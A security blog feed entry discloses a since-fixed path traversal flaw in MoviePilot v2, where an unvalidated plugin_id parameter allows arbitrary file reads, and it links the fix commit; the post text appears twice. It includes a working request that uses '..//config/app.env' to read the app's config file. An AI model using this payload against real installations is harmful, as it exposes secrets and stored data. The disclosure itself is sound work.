https://vuln.top/tags/moviepilotv2/ Recent content in MoviePilotv2 on Ca1s1'Blog Hugo -- gohugo.io en-us Thu, 19 Jun 2025 11:24:30 +0800 https://vuln.top/posts/moviepilotv2-fileread/ Thu, 19 Jun 2025 11:24:30 +0800 https://vuln.top/posts/moviepilotv2-fileread/ <h2 id="describe">describe</h2> <hr> <p>The system uses an <em>SQLite</em> database, so arbitrary file reading could access local <em>SQLite</em> files. This issue has been reported to the author, and a new version has been released with a fix.</p> <hr> <p>The vulnerability arises because the <em>plugin_id</em> parameter is not validated.</p> <p><img src="https://vuln.top/img/moviepilotv2/17503467122137.jpg" alt=""></p> <p><code>http://127.0.0.1:3000/api/v1/plugin/file/..//config/app.env</code></p> <p><img src="https://vuln.top/img/moviepilotv2/17496644265781.jpg" alt=""></p> <h2 id="repair">repair</h2> <p><code>https://github.com/jxxghp/MoviePilot/pull/4438/commits/2ba5d9484d86ef7ec8c80d69e3ebc8bb0d532de2</code></p> <h2 id="describe">describe</h2> <hr> <p>The system uses an <em>SQLite</em> database, so arbitrary file reading could access local <em>SQLite</em> files. This issue has been reported to the author, and a new version has been released with a fix.</p> <hr> <p>The vulnerability arises because the <em>plugin_id</em> parameter is not validated.</p> <p><img src="https://vuln.top/img/moviepilotv2/17503467122137.jpg" alt=""></p> <p><code>http://127.0.0.1:3000/api/v1/plugin/file/..//config/app.env</code></p> <p><img src="https://vuln.top/img/moviepilotv2/17496644265781.jpg" alt=""></p> <h2 id="repair">repair</h2> <p><code>https://github.com/jxxghp/MoviePilot/pull/4438/commits/2ba5d9484d86ef7ec8c80d69e3ebc8bb0d532de2</code></p>